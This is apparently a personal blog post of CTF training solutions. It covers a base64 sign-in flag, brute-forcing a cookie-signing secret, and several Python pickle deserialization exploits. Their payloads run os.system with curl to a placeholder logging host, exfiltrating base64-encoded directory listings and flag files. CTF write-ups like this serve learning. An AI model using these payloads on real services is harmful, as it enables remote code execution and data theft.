HITCTF TRAIN 做题记录

发布于 2019-10-27  37 次阅读


MISC

签到

打开源代码,观察到flag=ZmxhZ3t3ZTFjMG1lX3QwX0xpbGFjX0NURl9UMzRtfQo=

那么直接base64 decode得到flag

flag{we1c0me_t0_Lilac_CTF_T34m}

2019-11-03-WEB

2018-HITB-Python's-Revenge

先观察app.py

发现cookie_secret只有四位字母

爆破一下得到密码ctfd

爆破脚本:

import pickle 
import os
import string
from hashlib import sha256
import operator
import base64

asciis = string.ascii_letters + string.digits

sha = "b8ea3fb625c03dcaaa38615144b83944b23061a6fdba2e580f312a5f9504e597"

flag = 1

for a in asciis:
    if flag == 0:
        break
    for b in asciis:
        if flag == 0:
            break
        for c in asciis:
            if flag == 0:
                break
            for d in asciis:
                leak = "VnJlbQpwMAou".encode('utf-8')
                lyvs = sha256(leak+(a+b+c+d).encode('utf-8')).hexdigest()
                if lyvs == sha:
                    print(a+b+c+d)
                    flag = 0
                    break

那么我们来签一下名就行了

观察得到最多执行四个函数,还用黑名单屏蔽了几乎所有能用的函数

上网搜到map可以绕过

那么我们进行构造

注意:一定要在Linux下面运行,不然结果会something wrong,这个坑了我好半天,最后拿pickletools才看出来

查看目录

import pickle
import base64
import os
import hashlib
import pickletools

class Test(object):
    def __init__(self):
        self.a = 1
        self.b = '2'
        self.c = '3'
    def __reduce__(self):
        return map,(os.system,["curl -L {your_web_log_website}`ls -a / | base64`"])

secret = "ctfd"

def make_cookie(location, secret):
    return "%s!%s" % (calc_digest(location, secret), location.decode())

def calc_digest(location, secret):
    return hashlib.sha256("%s%s" % (location, secret)).hexdigest()

aa = Test()
payload = base64.b64encode(pickletools.optimize(pickle.dumps(aa)))
print make_cookie(payload,secret)

发现了flag

那么我们cat一下

import pickle
import base64
import os
import hashlib
import pickletools

class Test(object):
    def __init__(self):
        self.a = 1
        self.b = '2'
        self.c = '3'
    def __reduce__(self):
        return map,(os.system,["curl -L {your_web_log_website}`cat /flag | base64`"])

secret = "ctfd"

def make_cookie(location, secret):
    return "%s!%s" % (calc_digest(location, secret), location.decode())

def calc_digest(location, secret):
    return hashlib.sha256("%s%s" % (location, secret)).hexdigest()

aa = Test()
payload = base64.b64encode(pickletools.optimize(pickle.dumps(aa)))
print make_cookie(payload,secret)

2019-SJTU-Pickle

在坤坤的帮助下

我学会了pickle

import base64
import pickle
import os
import favorite

class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __repr__(self):
        return f'Animal(name={self.name!r}, category={self.category!r})'

    def __eq__(self, other):
        return True
    def __reduce__(self):
        return (Animal,(favorite.name,favorite.category))

fas = favorite.Animal(favorite.name, favorite.category)
fu = b'\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03cfavorite\nname\nq\x04X\x08\x00\x00\x00categoryq\x05cfavorite\ncategory\nq\x06ub.'

print(base64.b64encode(fu).decode())

2019-SJTU-Pickle-Revenge

观察和前一个pickle的区别,发现这玩意限制了模块只能由main启动,不能从别的模块那里弄到

那么根据奇妙的知识,我们就明白了可以利用一些巧妙的方式进行改写

直接上脚本

import pickle
import pickletools
import base64

payload = b"\x80\x03c__main__\nfavorite\n}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub0c__main__\nAnimal\n)\x81}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."

p = pickletools.optimize(payload)

last = "gANjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAa2l0dHlxBFgIAAAAY2F0ZWdvcnlxBVgDAAAAY2F0cQZ1Yi4="

print(base64.b64decode(last))

word = pickletools.optimize(base64.b64decode(last))

pickletools.dis(word)

pickletools.dis(p)

print(base64.b64encode(payload).decode())

2019-SJTU-Pickle-Revenge-Back

这个题需要一些RCE的技巧

URL

先获得目录

import os
import pickle
import pickletools
import base64

payload = b"\x80\x03c__main__\nAnimal\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl -L {your_web_log_website}`ls / |base64`\nb0c__main__\nAnimal\n}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."

pickletools.dis(payload)

print(base64.b64encode(payload).decode())

再拿到flag

import os
import pickle
import pickletools
import base64

payload = b"\x80\x03c__main__\nAnimal\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl -L {your_web_log_website}`cat /f11111111l4444gggg |base64`\nb0c__main__\nAnimal\n}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."

pickletools.dis(payload)

print(base64.b64encode(payload).decode())
It is my final heart.
最后更新于 2019-10-27